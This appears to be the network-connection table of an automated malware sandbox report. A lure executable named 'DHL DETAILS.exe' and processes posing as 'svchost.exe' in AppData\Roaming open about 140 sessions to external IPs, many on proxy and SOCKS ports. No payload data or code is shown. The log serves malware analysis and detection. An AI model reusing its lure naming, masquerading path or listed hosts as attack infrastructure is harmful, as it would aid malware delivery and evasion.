Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7200	192.168.2.5	53396	132.148.20.70	18504	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7201	192.168.2.5	64144	162.214.225.223	37581	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7202	192.168.2.5	53052	142.4.7.20	43100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7203	192.168.2.5	64436	123.110.158.236	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7204	192.168.2.5	64254	69.61.200.104	36181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7205	192.168.2.5	64454	64.56.150.102	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7206	192.168.2.5	52558	162.214.170.144	39503	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7207	192.168.2.5	64440	27.65.240.157	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7208	192.168.2.5	64439	202.150.1.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7209	192.168.2.5	64583	104.21.194.182	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7210	192.168.2.5	64592	172.67.182.102	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7211	192.168.2.5	64447	82.137.244.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7212	192.168.2.5	59928	163.172.129.251	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7213	192.168.2.5	64561	221.194.149.8	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7214	192.168.2.5	64528	193.138.178.6	8282	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7215	192.168.2.5	64161	94.23.220.136	35805	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7216	192.168.2.5	53156	45.11.95.165	5021	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7217	192.168.2.5	53468	62.85.224.217	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7218	192.168.2.5	53223	45.11.95.165	5031	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7219	192.168.2.5	52586	103.197.71.7	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7220	192.168.2.5	64619	172.67.181.85	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7221	192.168.2.5	53571	45.11.95.165	6014	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7222	192.168.2.5	52394	132.148.128.88	26606	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7223	192.168.2.5	64566	159.223.71.71	49922	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7224	192.168.2.5	63542	98.162.25.23	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7225	192.168.2.5	52900	103.182.112.11	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7226	192.168.2.5	64622	191.102.159.157	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7227	192.168.2.5	64582	216.9.224.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7228	192.168.2.5	64648	45.196.151.120	5432	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7229	192.168.2.5	64601	120.78.191.225	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7230	192.168.2.5	64604	43.128.146.42	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7231	192.168.2.5	64629	167.71.5.83	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7232	192.168.2.5	64680	47.114.101.57	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7233	192.168.2.5	64696	46.17.63.166	4154	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7234	192.168.2.5	64776	172.64.207.185	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7235	192.168.2.5	64764	3.212.148.199	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7236	192.168.2.5	60078	173.212.209.216	27138	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7237	192.168.2.5	64638	222.179.155.90	9091	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7238	192.168.2.5	64799	185.162.231.226	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7239	192.168.2.5	64713	194.247.173.17	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7240	192.168.2.5	63185	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7241	192.168.2.5	64736	61.111.38.5	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7242	192.168.2.5	64236	45.11.95.165	5019	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7243	192.168.2.5	64534	117.160.250.163	9990	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7244	192.168.2.5	64757	122.51.123.219	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7245	192.168.2.5	64854	104.17.239.10	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7246	192.168.2.5	64750	193.84.89.202	8443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7247	192.168.2.5	64767	91.202.230.219	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7248	192.168.2.5	65100	61.130.9.38	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7249	192.168.2.5	65102	61.130.9.38	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7250	192.168.2.5	65106	61.130.9.38	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7251	192.168.2.5	65111	61.130.9.38	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7252	192.168.2.5	64822	8.210.80.191	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7253	192.168.2.5	64866	74.119.147.209	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7254	192.168.2.5	64919	199.188.93.214	9000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7255	192.168.2.5	64906	38.162.0.221	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7256	192.168.2.5	64967	185.162.228.48	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7257	192.168.2.5	64535	68.71.247.130	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7258	192.168.2.5	65003	172.67.250.212	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7259	192.168.2.5	65237	152.32.132.220	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7260	192.168.2.5	64887	82.146.37.145	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7261	192.168.2.5	65241	152.32.132.220	443	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7262	192.168.2.5	65247	152.32.132.220	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7263	192.168.2.5	65250	152.32.132.220	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7264	192.168.2.5	64993	45.196.151.97	5432	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7265	192.168.2.5	60782	50.63.12.33	50781	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7266	192.168.2.5	60878	166.62.38.100	6322	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7267	192.168.2.5	65185	162.159.242.109	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7268	192.168.2.5	65215	45.14.174.180	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7269	192.168.2.5	64917	202.150.1.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7270	192.168.2.5	65018	159.203.61.169	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7271	192.168.2.5	65031	174.64.199.79	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7272	192.168.2.5	63420	82.223.121.72	4985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7273	192.168.2.5	64939	82.137.244.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7274	192.168.2.5	64923	139.129.202.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7275	192.168.2.5	65033	18.228.198.164	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7276	192.168.2.5	63459	158.220.91.231	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7277	192.168.2.5	55076	39.109.113.97	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7278	192.168.2.5	65047	103.166.141.74	20074	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7279	192.168.2.5	60463	104.248.158.78	53396	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7280	192.168.2.5	63469	45.76.150.19	50685	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7281	192.168.2.5	60895	34.135.166.24	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7282	192.168.2.5	60737	144.91.66.30	58285	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7283	192.168.2.5	65255	199.188.93.214	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7284	192.168.2.5	65127	8.219.179.237	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7285	192.168.2.5	65259	104.21.66.184	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7286	192.168.2.5	65267	104.23.107.172	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7287	192.168.2.5	64266	218.65.6.150	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7288	192.168.2.5	65219	193.136.97.17	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7289	192.168.2.5	61148	162.214.225.223	48414	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7290	192.168.2.5	65229	216.9.224.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7291	192.168.2.5	64036	68.71.254.6	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7292	192.168.2.5	60862	41.111.198.108	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7293	192.168.2.5	64422	45.144.164.28	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7294	192.168.2.5	65101	69.61.200.104	36181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7295	192.168.2.5	65251	185.110.190.99	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7296	192.168.2.5	60805	132.148.245.247	60349	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7297	192.168.2.5	65297	74.119.147.209	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7298	192.168.2.5	65348	192.154.246.96	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7299	192.168.2.5	64427	178.72.89.106	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7300	192.168.2.5	65302	122.51.123.219	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7301	192.168.2.5	65305	8.210.80.191	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7302	192.168.2.5	65371	162.159.250.145	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7303	192.168.2.5	65372	199.188.93.214	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7304	192.168.2.5	65386	104.20.125.124	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7305	192.168.2.5	65043	180.250.159.49	4153	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7306	192.168.2.5	64634	198.12.253.117	31131	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7307	192.168.2.5	65312	45.11.95.165	5047	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7308	192.168.2.5	55500	31.42.184.146	57752	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7309	192.168.2.5	65426	172.67.14.237	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7310	192.168.2.5	65360	23.137.248.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7311	192.168.2.5	65420	68.71.254.6	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7312	192.168.2.5	61953	156.67.172.185	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7313	192.168.2.5	63654	51.158.125.135	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7314	192.168.2.5	61853	143.208.152.61	3180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7315	192.168.2.5	65398	46.17.63.166	4154	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7316	192.168.2.5	49202	211.234.125.5	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7317	192.168.2.5	49203	211.234.125.5	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7318	192.168.2.5	61460	45.117.179.209	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7319	192.168.2.5	55806	103.164.116.172	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7320	192.168.2.5	65026	115.244.127.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7321	192.168.2.5	65394	202.150.1.87	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7322	192.168.2.5	65502	192.154.246.96	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7323	192.168.2.5	65417	82.137.244.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7324	192.168.2.5	65424	45.11.95.165	5021	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7325	192.168.2.5	61511	103.70.206.129	59311	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7326	192.168.2.5	64921	68.169.60.220	8380	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7327	192.168.2.5	65477	74.119.147.209	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7328	192.168.2.5	49158	199.188.93.214	9000	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7329	192.168.2.5	65454	103.166.141.74	20074	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7330	192.168.2.5	49195	72.167.222.102	9493	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7331	192.168.2.5	65463	8.219.179.237	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7332	192.168.2.5	56607	94.154.152.10	8079	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7333	192.168.2.5	64833	103.160.149.34	3127	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7334	192.168.2.5	61643	95.111.227.164	51610	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7335	192.168.2.5	49163	185.162.229.70	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7336	192.168.2.5	65520	185.110.190.99	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7337	192.168.2.5	63708	171.244.140.160	17525	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7338	192.168.2.5	65500	216.9.224.113	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7339	192.168.2.5	65506	218.65.6.150	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7340	192.168.2.5	49161	81.169.187.194	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
